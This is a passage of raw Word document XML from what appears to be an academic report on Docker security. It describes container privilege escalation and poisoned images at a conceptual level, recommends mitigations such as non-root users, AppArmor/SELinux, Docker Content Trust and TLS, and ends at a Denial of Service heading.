        <w:t xml:space="preserve"> various</w:t>
      </w:r>
      <w:r w:rsidR="00D1290C">
        <w:t xml:space="preserve"> components</w:t>
      </w:r>
      <w:r w:rsidR="001B3C8D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E73BDE">
        <w:t>Docker daemon</w:t>
      </w:r>
      <w:r w:rsidR="00A43C22">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E6609A">
        <w:t>Docker registry</w:t>
      </w:r>
      <w:r w:rsidR="00A43C22">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A43C22">
        <w:lastRenderedPageBreak/>
        <w:t>images, and containers</w:t>
      </w:r>
      <w:r w:rsidR="00BE71DF">
        <w:t>, as discussed in the above</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-374464548"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001905AC">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001905AC">
            <w:instrText xml:space="preserve"> CITATION DHu19 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="001905AC">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[40]</w:t>
          </w:r>
          <w:r w:rsidR="001905AC">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D1290C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="00870C71">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> types of</w:t>
      </w:r>
      <w:r w:rsidR="00C0420F">
        <w:t xml:space="preserve"> known</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> attacks on</w:t>
      </w:r>
      <w:r w:rsidR="00F71F6D">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="004200EB">
        <w:t xml:space="preserve"> Docker system are outlined </w:t>
      </w:r>
      <w:r w:rsidR="007661E3">
        <w:t>as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0882F5" w14:textId="4976BD79" w:rsidR="00C45BEE" w:rsidRDefault="00961AAC" w:rsidP="00961AAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc86859260"/>
      <w:r>
        <w:t xml:space="preserve">Container Privilege </w:t>
      </w:r>
      <w:r w:rsidR="00221F7E">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00FB43A5">
        <w:t>scalations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="1E49F18B" w14:textId="7B2566FE" w:rsidR="00D02ED3" w:rsidRDefault="000535EE" w:rsidP="00B01619">
      <w:r>
        <w:t xml:space="preserve">Containers are </w:t>
      </w:r>
      <w:r w:rsidR="00CF164C">
        <w:t>lightweight running instances of a</w:t>
      </w:r>
      <w:r w:rsidR="001A6178">
        <w:t xml:space="preserve"> run time</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application in which they</w:t>
      </w:r>
      <w:r w:rsidR="00F91637">
        <w:t xml:space="preserve"> all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> share the kernel with the host.</w:t>
      </w:r>
      <w:r w:rsidR="00C3463E">
        <w:t xml:space="preserve"> Simply put, a container </w:t>
      </w:r>
      <w:r w:rsidR="00F66223">
        <w:t xml:space="preserve">contains packages </w:t>
      </w:r>
      <w:r w:rsidR="005F2FA0">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00F66223">
        <w:t>all the necessary</w:t>
      </w:r>
      <w:r w:rsidR="00D6444F">
        <w:t xml:space="preserve"> libraries and </w:t>
      </w:r>
      <w:r w:rsidR="00FB1124">
        <w:t xml:space="preserve">dependencies for an application to run </w:t>
      </w:r>
      <w:r w:rsidR="005F2FA0">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="00866F99">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00480737">
        <w:t>secluded environment.</w:t>
      </w:r>
      <w:r w:rsidR="008E7651">
        <w:t xml:space="preserve"> The Docker engine </w:t>
      </w:r>
      <w:r w:rsidR="00DD2C93">
        <w:t>uses various Linux kernel features</w:t>
      </w:r>
      <w:r w:rsidR="001971F6">
        <w:t xml:space="preserve"> to isolate multiple </w:t>
      </w:r>
      <w:r w:rsidR="001D24AC">
        <w:t>containers running inside a single host.</w:t>
      </w:r>
      <w:r w:rsidR="00CC1173">
        <w:t xml:space="preserve"> However, in situations </w:t>
      </w:r>
      <w:r w:rsidR="00EE5CA3">
        <w:t>running a vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00502DF4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C36DAC">
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00A53F08">
        <w:t>with a privilege flag</w:t>
      </w:r>
      <w:r w:rsidR="008D4F5A">
        <w:t xml:space="preserve"> container c</w:t>
      </w:r>
      <w:r w:rsidR="009C7D3E">
        <w:t xml:space="preserve">ould </w:t>
      </w:r>
      <w:r w:rsidR="00505C3E">
        <w:t xml:space="preserve">allow </w:t>
      </w:r>
      <w:r w:rsidR="00EA3696">
        <w:t xml:space="preserve">cybercriminals to gain access to </w:t>
      </w:r>
      <w:r w:rsidR="007A0E50">
        <w:t>the host’s critical resources</w:t>
      </w:r>
      <w:r w:rsidR="00A15F43">
        <w:t xml:space="preserve"> with root access</w:t>
      </w:r>
      <w:r w:rsidR="007A0E50">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E6520">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA5A4B">
        <w:t xml:space="preserve">This means that an attacker will be able to conduct various capabilities inside the host or other containers with root privilege. </w:t>
      </w:r>
      <w:r w:rsidR="006E6520">
        <w:t>In s</w:t>
      </w:r>
      <w:r w:rsidR="002645EA">
        <w:t xml:space="preserve">uch </w:t>
      </w:r>
      <w:r w:rsidR="006E6520">
        <w:t xml:space="preserve">cases, </w:t>
      </w:r>
      <w:r w:rsidR="00025546">
        <w:t xml:space="preserve">the potential attack </w:t>
      </w:r>
      <w:r w:rsidR="00DF1D21">
        <w:t xml:space="preserve">surface is </w:t>
      </w:r>
      <w:r w:rsidR="003D5F4D">
        <w:t>far-reaching</w:t>
      </w:r>
      <w:r w:rsidR="00DF1D21">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00E229C3">
        <w:t xml:space="preserve"> allows </w:t>
      </w:r>
      <w:r w:rsidR="00605956">
        <w:t xml:space="preserve">the attacker to compromise </w:t>
      </w:r>
      <w:r w:rsidR="00943682">
        <w:t xml:space="preserve">other running containers </w:t>
      </w:r>
      <w:r w:rsidR="004C3B4E">
        <w:t>and the host.</w:t>
      </w:r>
      <w:r w:rsidR="00FA20BE">
        <w:t xml:space="preserve"> Such an attack is </w:t>
      </w:r>
      <w:r w:rsidR="001C1D65">
        <w:t>named</w:t>
      </w:r>
      <w:r w:rsidR="00FA20BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003801D4">
        <w:t>privilege escalation</w:t>
      </w:r>
      <w:r w:rsidR="00092C76">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003E4841">
        <w:t xml:space="preserve">allowing malicious users </w:t>
      </w:r>
      <w:r w:rsidR="00D70AA4">
        <w:t>to run as root users</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="934636834"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001A79C9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A79C9">
            <w:instrText xml:space="preserve"> CITATION TCo16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B42A74">
            <w:instrText xml:space="preserve"> \m ZJi17</w:instrText>
          </w:r>
          <w:r w:rsidR="00B67508">
            <w:instrText xml:space="preserve"> \m MDe19</w:instrText>
          </w:r>
          <w:r w:rsidR="00EE4BE8">
            <w:instrText xml:space="preserve"> \m Lin18</w:instrText>
          </w:r>
          <w:r w:rsidR="001A79C9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[46, 52, 53, 54]</w:t>
          </w:r>
          <w:r w:rsidR="001A79C9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D70AA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7DCCC9" w14:textId="0C778EAD" w:rsidR="00B67508" w:rsidRDefault="0095660E" w:rsidP="00B01619">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00DD5FBA">
        <w:t>he privilege attack can be mitigated</w:t>
      </w:r>
      <w:r w:rsidR="009C5D68">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00EA5B1D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="009C5D68">
        <w:t>Linux hardening techniques</w:t>
      </w:r>
      <w:r>
        <w:t>, me</w:t>
      </w:r>
      <w:r w:rsidR="00EA5B1D">
        <w:t>ntioned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00907AFB">
        <w:t>bove</w:t>
      </w:r>
      <w:r w:rsidR="009C5D68">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00307405">
        <w:t xml:space="preserve"> According to </w:t>
      </w:r>
      <w:r w:rsidR="009E4E3A">
        <w:t>OWASP i</w:t>
      </w:r>
      <w:r w:rsidR="000C3092">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1754938272"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000C3092">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000C3092">
            <w:instrText xml:space="preserve"> CITATION OWA21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="000C3092">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
          <w:r w:rsidR="000C3092">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="000C3092">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00492875">
        <w:t xml:space="preserve"> it is recommended </w:t>
      </w:r>
      <w:r w:rsidR="001031EC">
        <w:t xml:space="preserve">to run a container </w:t>
      </w:r>
      <w:r w:rsidR="0000644E">
        <w:t xml:space="preserve">process </w:t>
      </w:r>
      <w:r w:rsidR="00CA4C56">
        <w:t xml:space="preserve">under a limited capabilities </w:t>
      </w:r>
      <w:r w:rsidR="002E35D7">
        <w:t>and non-privileged user</w:t>
      </w:r>
      <w:r w:rsidR="00BF1731">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00286EA9">
        <w:t xml:space="preserve"> Docker also </w:t>
      </w:r>
      <w:r w:rsidR="00416AAE">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="003A3680">
        <w:t>additional</w:t>
      </w:r>
      <w:r w:rsidR="00753995">
        <w:t xml:space="preserve"> options to enhance its security</w:t>
      </w:r>
      <w:r w:rsidR="00661235">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00387232">
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1780474231"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0078110D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0078110D">
            <w:instrText xml:space="preserve"> CITATION doc212 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="0078110D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="0078110D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00A40CC2">
        <w:t xml:space="preserve">, it is strongly suggested to </w:t>
      </w:r>
      <w:r w:rsidR="00F5308C">
        <w:t xml:space="preserve">run the Docker engine under </w:t>
      </w:r>
      <w:r w:rsidR="0076702E">
        <w:t>the Linux kernel features, including AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="00B41990">
        <w:t xml:space="preserve"> and SELinux.</w:t>
      </w:r>
      <w:r w:rsidR="005725C1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001753D2">
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00C01C00">
        <w:t xml:space="preserve">non-trusted applications </w:t>
      </w:r>
      <w:r w:rsidR="00DF47D8">
        <w:t xml:space="preserve">should run </w:t>
      </w:r>
      <w:r w:rsidR="00907D7F">
        <w:t>under non-root user</w:t>
      </w:r>
      <w:r w:rsidR="00DA20B6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00907D7F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005456E4">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00DA20B6">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="005456E4">
        <w:t xml:space="preserve">separated from </w:t>
      </w:r>
      <w:r w:rsidR="002D1886">
        <w:t>the trusted groups.</w:t>
      </w:r>
      <w:r w:rsidR="00780036">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="007F383C">
        <w:t xml:space="preserve">container files </w:t>
      </w:r>
      <w:r w:rsidR="002630A7">
        <w:t>should run in read onl</w:t>
      </w:r>
      <w:r w:rsidR="00D63A90">
        <w:t xml:space="preserve">y mode to prevent privilege </w:t>
      </w:r>
      <w:r w:rsidR="007443C6">
        <w:t>and kernel attacks</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-112830600"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DA6E39">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00DA6E39">
            <w:instrText xml:space="preserve"> CITATION EWi14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E87FEE">
            <w:instrText xml:space="preserve"> \m SUp16</w:instrText>
          </w:r>
          <w:r w:rsidR="00DA6E39">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[56, 57]</w:t>
          </w:r>
          <w:r w:rsidR="00DA6E39">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="007443C6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F80AE6">
        <w:t xml:space="preserve"> Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00C1714B">
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00593AE9">
        <w:t>ning</w:t>
      </w:r>
      <w:r w:rsidR="00C1714B">
        <w:t xml:space="preserve"> a container with </w:t>
      </w:r>
      <w:r w:rsidR="00593AE9">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00C1714B">
        <w:t>non-</w:t>
      </w:r>
      <w:r w:rsidR="005E1AB4">
        <w:t xml:space="preserve">root user is </w:t>
      </w:r>
      <w:r w:rsidR="00DF7C9C">
        <w:t>crucial to prevent privilege escalation attacks</w:t>
      </w:r>
      <w:r w:rsidR="00895EEB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261DF3B9" w14:textId="35CC57EC" w:rsidR="009E608B" w:rsidRDefault="00582216" w:rsidP="000E4D30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc86859261"/>
      <w:r>
        <w:t xml:space="preserve">Poisoned </w:t>
      </w:r>
      <w:r w:rsidR="000E4D30">
        <w:t>Images</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="7B55C48F" w14:textId="3D480EBB" w:rsidR="001351C8" w:rsidRDefault="00C953C6" w:rsidP="001351C8">
      <w:r>
        <w:t xml:space="preserve">Images are the blueprint </w:t>
      </w:r>
      <w:r w:rsidR="004D1854">
        <w:t xml:space="preserve">with instructions to </w:t>
      </w:r>
      <w:r w:rsidR="008348A3">
        <w:t xml:space="preserve">build </w:t>
      </w:r>
      <w:r w:rsidR="0033309A">
        <w:t>a container</w:t>
      </w:r>
      <w:r w:rsidR="004C736F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00986904">
        <w:t xml:space="preserve"> As </w:t>
      </w:r>
      <w:r w:rsidR="007453BA">
        <w:t xml:space="preserve">discussed above, images </w:t>
      </w:r>
      <w:r w:rsidR="00863C67">
        <w:t xml:space="preserve">can be shared </w:t>
      </w:r>
      <w:r w:rsidR="00025B41">
        <w:t>via private or public repositories</w:t>
      </w:r>
      <w:r w:rsidR="005B150F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DE5CF3">
        <w:t xml:space="preserve"> However, Docker </w:t>
      </w:r>
      <w:r w:rsidR="00D75E9E">
        <w:t xml:space="preserve">uses its </w:t>
      </w:r>
      <w:r w:rsidR="00815AF7">
        <w:t>public repository</w:t>
      </w:r>
      <w:r w:rsidR="00072490">
        <w:t xml:space="preserve"> Docker Hub</w:t>
      </w:r>
      <w:r w:rsidR="000E0DC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00072490">
        <w:t>by default.</w:t>
      </w:r>
      <w:r w:rsidR="00FB1AC6">
        <w:t xml:space="preserve"> Users interact </w:t>
      </w:r>
      <w:r w:rsidR="00910153">
        <w:t xml:space="preserve">with the registry </w:t>
      </w:r>
      <w:r w:rsidR="0033593D">
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00473FEC">
        <w:t xml:space="preserve"> an API</w:t>
      </w:r>
      <w:r w:rsidR="0033593D">
        <w:t xml:space="preserve"> through the internet</w:t>
      </w:r>
      <w:r w:rsidR="00473FEC">
        <w:t xml:space="preserve"> to pull or push images remotely</w:t>
      </w:r>
      <w:r w:rsidR="001F615B">
        <w:t xml:space="preserve"> via HTTP</w:t>
      </w:r>
      <w:r w:rsidR="00473FEC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B4E4A">
        <w:t xml:space="preserve"> This implies that </w:t>
      </w:r>
      <w:r w:rsidR="00CE0408">
        <w:t>the API is exposed to the internet</w:t>
      </w:r>
      <w:r w:rsidR="00AB5E74">
        <w:t>, increasing the p</w:t>
      </w:r>
      <w:r w:rsidR="00AF1A4A">
        <w:t xml:space="preserve">otential </w:t>
      </w:r>
      <w:r w:rsidR="00CF52F0">
        <w:t xml:space="preserve">danger </w:t>
      </w:r>
      <w:r w:rsidR="00AF1A4A">
        <w:t>to hijackers.</w:t>
      </w:r>
      <w:r w:rsidR="00CF52F0">
        <w:t xml:space="preserve"> As a result</w:t>
      </w:r>
      <w:r w:rsidR="00B65453">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A74C5">
        <w:t xml:space="preserve">an attacker </w:t>
      </w:r>
      <w:r w:rsidR="0038250C">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="00F73043">
        <w:t xml:space="preserve">poison the images with some </w:t>
      </w:r>
      <w:r w:rsidR="002B4109">
        <w:t xml:space="preserve">malwares or viruses </w:t>
      </w:r>
      <w:r w:rsidR="00F01349">
        <w:t xml:space="preserve">in order to gain access or </w:t>
      </w:r>
      <w:r w:rsidR="001E107F">
        <w:t>perform malicious activities.</w:t>
      </w:r>
      <w:r w:rsidR="009E56A7">
        <w:t xml:space="preserve"> Alternatively, </w:t>
      </w:r>
      <w:r w:rsidR="00047239">
        <w:t xml:space="preserve">attackers can </w:t>
      </w:r>
      <w:r w:rsidR="005E0863">
        <w:t xml:space="preserve">use outdated or vulnerable applications </w:t>
      </w:r>
      <w:r w:rsidR="00D441A1">
        <w:t xml:space="preserve">to poison images </w:t>
      </w:r>
      <w:r w:rsidR="00656DC0">
        <w:t xml:space="preserve">and push them </w:t>
      </w:r>
      <w:r w:rsidR="001F4FC6">
        <w:t>to public repositories</w:t>
      </w:r>
      <w:r w:rsidR="00ED74A8">
        <w:t xml:space="preserve">. As such, </w:t>
      </w:r>
      <w:r w:rsidR="006D4D49">
        <w:t xml:space="preserve">someone </w:t>
      </w:r>
      <w:r w:rsidR="00756E78">
        <w:t xml:space="preserve">can download that image without </w:t>
      </w:r>
      <w:r w:rsidR="008538A4">
        <w:t xml:space="preserve">checking </w:t>
      </w:r>
      <w:r w:rsidR="004E0A7E">
        <w:t xml:space="preserve">and verifying its </w:t>
      </w:r>
      <w:r w:rsidR="0092153C">
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidR="00FB1D1C">
        <w:t xml:space="preserve">, allowing the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00A05172">
        <w:t>exploit and</w:t>
      </w:r>
      <w:r w:rsidR="00E671A1">
        <w:t xml:space="preserve"> steal sensitive information</w:t>
      </w:r>
      <w:r w:rsidR="0036384A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E7AA4">
        <w:t xml:space="preserve"> Further, image </w:t>
      </w:r>
      <w:r w:rsidR="007E7AA4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">vulnerabilities can </w:t>
      </w:r>
      <w:r w:rsidR="00A06F8E">
        <w:t xml:space="preserve">enable hijackers to </w:t>
      </w:r>
      <w:r w:rsidR="00E75BFA">
        <w:t>insert backdoor</w:t>
      </w:r>
      <w:r w:rsidR="0078180E">
        <w:t xml:space="preserve">s to run cryptocurrency </w:t>
      </w:r>
      <w:r w:rsidR="00440B40">
        <w:t>mining malware</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-200244734"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="001468D3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001468D3">
            <w:instrText xml:space="preserve"> CITATION JRu14 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A74D34">
            <w:instrText xml:space="preserve"> \m DFG21</w:instrText>
          </w:r>
          <w:r w:rsidR="001468D3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[58, 59]</w:t>
          </w:r>
          <w:r w:rsidR="001468D3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E671A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2192AFFD" w14:textId="02438E58" w:rsidR="00A46275" w:rsidRDefault="00A46275" w:rsidP="001351C8">
      <w:r>
        <w:t xml:space="preserve">For better security, </w:t>
      </w:r>
      <w:r w:rsidR="00064260">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00050186">
        <w:t xml:space="preserve">Docker registry API </w:t>
      </w:r>
      <w:r w:rsidR="005D7C87">
        <w:t xml:space="preserve">should run </w:t>
      </w:r>
      <w:r w:rsidR="00AC5762">
        <w:t>in a</w:t>
      </w:r>
      <w:r w:rsidR="00F72DC1">
        <w:t xml:space="preserve"> secure env</w:t>
      </w:r>
      <w:r w:rsidR="006F46B4">
        <w:t xml:space="preserve">ironment </w:t>
      </w:r>
      <w:r w:rsidR="00CE6070">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="004A6A01">
        <w:t>thwart poisoning attacks</w:t>
      </w:r>
      <w:r w:rsidR="0080610F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BA526C">
        <w:t xml:space="preserve"> Another </w:t>
      </w:r>
      <w:r w:rsidR="005D65B2">
        <w:t xml:space="preserve">method to mitigate such attacks is </w:t>
      </w:r>
      <w:r w:rsidR="00137C0A">
        <w:t xml:space="preserve">to use DCT </w:t>
      </w:r>
      <w:r w:rsidR="00223A9B">
        <w:t xml:space="preserve">to ensure that </w:t>
      </w:r>
      <w:r w:rsidR="00CD2F4E">
        <w:t xml:space="preserve">only authenticated and trusted images are used </w:t>
      </w:r>
      <w:r w:rsidR="007633EC">
        <w:t>within the Docker cluster.</w:t>
      </w:r>
      <w:r w:rsidR="00BE177D">
        <w:t xml:space="preserve"> In addition, </w:t>
      </w:r>
      <w:r w:rsidR="007E7972">
        <w:t>the API connection should</w:t>
      </w:r>
      <w:r w:rsidR="00043892">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidR="007E7972">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00043892">
        <w:t>secured using TLS</w:t>
      </w:r>
      <w:r w:rsidR="00B233D2">
        <w:t xml:space="preserve"> and proxy connections</w:t>
      </w:r>
      <w:r w:rsidR="00043892">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF524D">
        <w:t xml:space="preserve">to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00E56525">
        <w:t>malicious image execution.</w:t>
      </w:r>
      <w:r w:rsidR="00713E87">
        <w:t xml:space="preserve"> Also, </w:t>
      </w:r>
      <w:r w:rsidR="00757BE5">
        <w:t xml:space="preserve">the local </w:t>
      </w:r>
      <w:r w:rsidR="007F1ECD">
        <w:t xml:space="preserve">docker.io </w:t>
      </w:r>
      <w:r w:rsidR="00C256AE">
        <w:t>must be</w:t>
      </w:r>
      <w:r w:rsidR="007F1ECD">
        <w:t xml:space="preserve"> disabled to prevent </w:t>
      </w:r>
      <w:r w:rsidR="007D2874">
        <w:t xml:space="preserve">such security </w:t>
      </w:r>
      <w:r w:rsidR="00FA6BB6">
        <w:t>problems</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-825512519"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000910A9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000910A9">
            <w:instrText xml:space="preserve"> CITATION DFG21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E91BD9">
            <w:instrText xml:space="preserve"> \m doc16</w:instrText>
          </w:r>
          <w:r w:rsidR="000910A9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[59, 47]</w:t>
          </w:r>
          <w:r w:rsidR="000910A9">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00FA6BB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569C0E7" w14:textId="34142E33" w:rsidR="00EF6313" w:rsidRDefault="00745D3C" w:rsidP="00DA4F65">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc86859262"/>
      <w:r>
        <w:t xml:space="preserve">Denial of Service </w:t>
      </w:r>
      <w:r w:rsidR="00AF34D7">
        <w:t>(Dos)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
